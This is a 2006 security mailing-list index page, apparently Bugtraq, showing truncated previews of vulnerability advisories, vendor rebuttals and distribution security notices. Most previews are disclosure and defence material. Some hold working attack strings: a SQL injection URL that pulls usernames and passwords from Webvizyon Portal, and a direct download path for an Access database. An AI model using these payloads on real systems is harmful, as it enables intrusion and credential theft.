|
|
Colapse all |
Post message
Re: Mico crashes when contected with wrong IOR / DoS 2006-07-10 Karel Gardas (kgardas objectsecurity com) Webmin / Usermin Arbitrary File Disclosure Vulnerability exploit 2006-07-09 Alexander Hristov (joffer gmail com) Name : Webmin / Usermin Arbitrary File Disclosure Vulnerability exploit Link : http://securitydot.net/xpl/exploits/vulnerabilities/articles/1152/exploi t.html Date : 2006-06-30 Patch : update to version 1.290 Advisory : http://securitydot.net/vuln/exploits/vulnerabilities/articles/17885/vuln .html -- [ more ] [ reply ] Re: Re: vBulletin 3.5.4 (install_path) Exploit 2006-07-08 mikathebest2003 yahoo de Quote: The default vBulletin requires authentication prior to the usage of the upgrade system and the backup feature. Well, but tell me when I will find a way to crack this requires authentication, then it will be possible to download every database. And this requires authenication dont look [ more ] [ reply ] MS Word Unchecked Boundary Condition Vulnerability 2006-07-10 naveed (naveedafzal gmail com) /*------------------------------------------------------------ * Microsoft Word unchecked boundary condition vulnerability. * --------------------------------------------------------- * One of the functions in mso.dll (older versions mso9.dll) * cannot properly handle the specially cra [ more ] [ reply ] Digital Armaments Security Advisory 10.07.2006: Flexwath Authorization Bypassing and XSS Vulnerability 2006-07-10 info digitalarmaments com Digital Armaments advisory is 04.15.2006 http://www.digitalarmaments.com/2006300687985463.html I. Background FlexWATCH is a stand-alone network camera server with built-in CMOS camera and web server which deliver crisp real time live videos at a rate up to 30fps over the network. It is normal [ more ] [ reply ] CC announces new Rootkit help forum insync with Book 2006-07-06 Paul Laudanski (zx castlecops com) <http://www.castlecops.com/a6621-CastleCops_Announces_New_Rootkit_Help_F orum.html> -- Paul Laudanski, Microsoft MVP Windows-Security Submit Phish: www.castlecops.com/pirt Phish XML Feed: www.castlecops.com/article6619.html [de] http://de.castlecops.com [en] http://castlecops.com [wiki] http://wiki [ more ] [ reply ] RE: MIMESweeper For Web 5.X Cross Site Scripting 2006-07-10 Erez Metula (erezmetula 2bsecure co il) MIMESweeper For Web 5.X Cross Site Scripting I. INTRODUCTION MIMESweeper For Web is a policy-based content security for web applications. It analyzes web content and blocks pages or files that are prohibited by the organizational security policy. For more Information please refer to: http://ww [ more ] [ reply ] Re: Invision Power Board v1.3 Final SQL Injection 2006-07-10 mattmecham gmail com At no point does the CODE parameter touch the database. The CODE parameter is used in a SWITCH statement to determine which function to run - it just directs traffic. Secondly, IPB 1.3 is no longer officially supported by us (IPS) and is no longer available for purchase or download. [ more ] [ reply ] [USN-312-1] gimp vulnerability 2006-07-10 Martin Pitt (martin pitt canonical com) =========================================================== Ubuntu Security Notice USN-312-1 July 10, 2006 gimp vulnerability CVE-2006-3404 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 5.04 Ubuntu 5.10 Ubun [ more ] [ reply ] [ GLSA 200607-05 ] SHOUTcast server: Multiple vulnerabilities 2006-07-09 Sune Kloppenborg Jeppesen (jaervosz gentoo org) RE: WebEx Downloader Plug-in Multiple Vulnerabilities + rant 2006-07-09 Web Ex (exwebex yahoo ca) *498 days to fix an arbitrary code vulnerability *Silently fixing buffer overrun vulns without releasing an advisory (http://xforce.iss.net/xforce/alerts/id/226, in "Additional Information" section) Hmph. Wow. I wonder if they kill-bitted older versions >>>hehehe ;-) I ran across at least som [ more ] [ reply ] [SECURITY] [DSA 1106-1] New ppp packages fix privilege escalation 2006-07-10 joey infodrom org (Martin Schulze) [ECHO_ADV_37$2006] pc_cookbook Mambo/Joomla Component <= v0.3 Remote File Include Vulnerabilities 2006-07-10 matdhule gmail com ERNW Security Advisory 02/2006 - Buffer Overflow in sipXtapi (used in AOL Triton) 2006-07-10 mozilla ids-guide de ERNW Security Advisory 02-2006 Buffer Overflow in SIP Foundry's SipXtapi Author: Michael Thumann <mthumann[at]ernw.de> Homepage: www.ernw.de 1. Summary: The sipXtapi library from sip foundry contains a buffer overflow when parsing the CSeq field. This flaw can be used by an attacker to gain cont [ more ] [ reply ] LAMP vs Microsoft 2006-07-09 Darren Reed (avalon caligula anu edu au) Does anyone have statistics on the cumulative vulnerabilities in LAMP vs the equivalent for Microsoft ? (I'm also interested in whether there are better, as in more secure, environments than LAMP.) If the number of vulnerabilities is graphed over time, is either heading down or both heading up or [ more ] [ reply ] MT Örümcek Toplist v2.2 Version Microsoft Access Driver ( MDB ) Download 2006-07-09 StorMBoY BsdMaiL Org Title : MT Örümcek Toplist v2.2 Version Microsoft Access Driver ( MDB ) Download - Site : http://www.Cyber-Warrior.org - Author : StorMBoY - Mail : StorMBoY (at) BsdMail (dot) Org [email concealed] - Exploit : http://www.target.com/path/db/orumcektoplist.mdb - Code : <% Set baglanti [ more ] [ reply ] Re: RE: Invision Vulnerabilities, including remote code execution 2006-07-10 mattmecham gmail com We have cleaned up much of the post parser in a recent security update which included removing the block of code that attempts to decode hex entities into HTML. Part of the problem is trying to balance a feature rich application against various browser bugs (of which IE is the worst culprit for r [ more ] [ reply ] Re: Mico crashes when contected with wrong IOR / DoS 2006-07-09 tuergeist (tuergeist googlemail com) Graffiti Forums v1.0 SQL Injection Vulnerabilities 2006-07-08 paisterist nst gmail com /* -------------------------------------------------------- [N]eo [S]ecurity [T]eam [NST] - Advisory #24 - 08/07/06 -------------------------------------------------------- Program: Graffiti Forums Homepage: http://www.bluedojo.com/ Vulnerable Versions: 1.0. Risk: High! Impact: Critical Risk [ more ] [ reply ] Re: Invision Power Board "v1.X & 2.X" SQL Injection 2006-07-10 mattmecham gmail com Note, none of these 'exploits' have any chance of working. The CODE attribute is never present in an SQL query - it's only used in a switch statement to direct incoming 'traffic' to the correct function within a class. Further more 'act' parameters: 'ketqua' and file 'coin_list.php' are not st [ more ] [ reply ] [ GLSA 200607-04 ] PostgreSQL: SQL injection 2006-07-09 Sune Kloppenborg Jeppesen (jaervosz gentoo org) Webvizyon Portal 2006 Version SQL Injection 2006-07-08 StorMBoY BsdMail Org Title : Webvizyon Portal 2006 Version SQL Injection - Site : http://www.Cyber-Warrior.org - Author : StorMBoY - Mail : StorMBoY (at) BsdMail (dot) Org [email concealed] - Exploit : http://www.target.com/path/SayfalaAltList.asp?ID=-1 UNION ALL SELECT 0,kullaniciadi,sifre FROM uyeler - # S [ more ] [ reply ] [ GLSA 200607-03 ] libTIFF: Multiple buffer overflows 2006-07-09 Sune Kloppenborg Jeppesen (jaervosz gentoo org) |
|
Privacy Statement |
Hello,
I would just like to add some corrections to disclosure below.
On Thu, 6 Jul 2006, tuergeist wrote:
> == == == TOC == == ==
>
> 1. Affected Vendor
> 2. Affected Product
> 3. Vulnerability
> 4. Safety Hazard
> 5. Disclosure Timeline
> 6. Vendor Response
> 7. Patch / Workaround
> 8. Vulner
[ more ] [ reply ]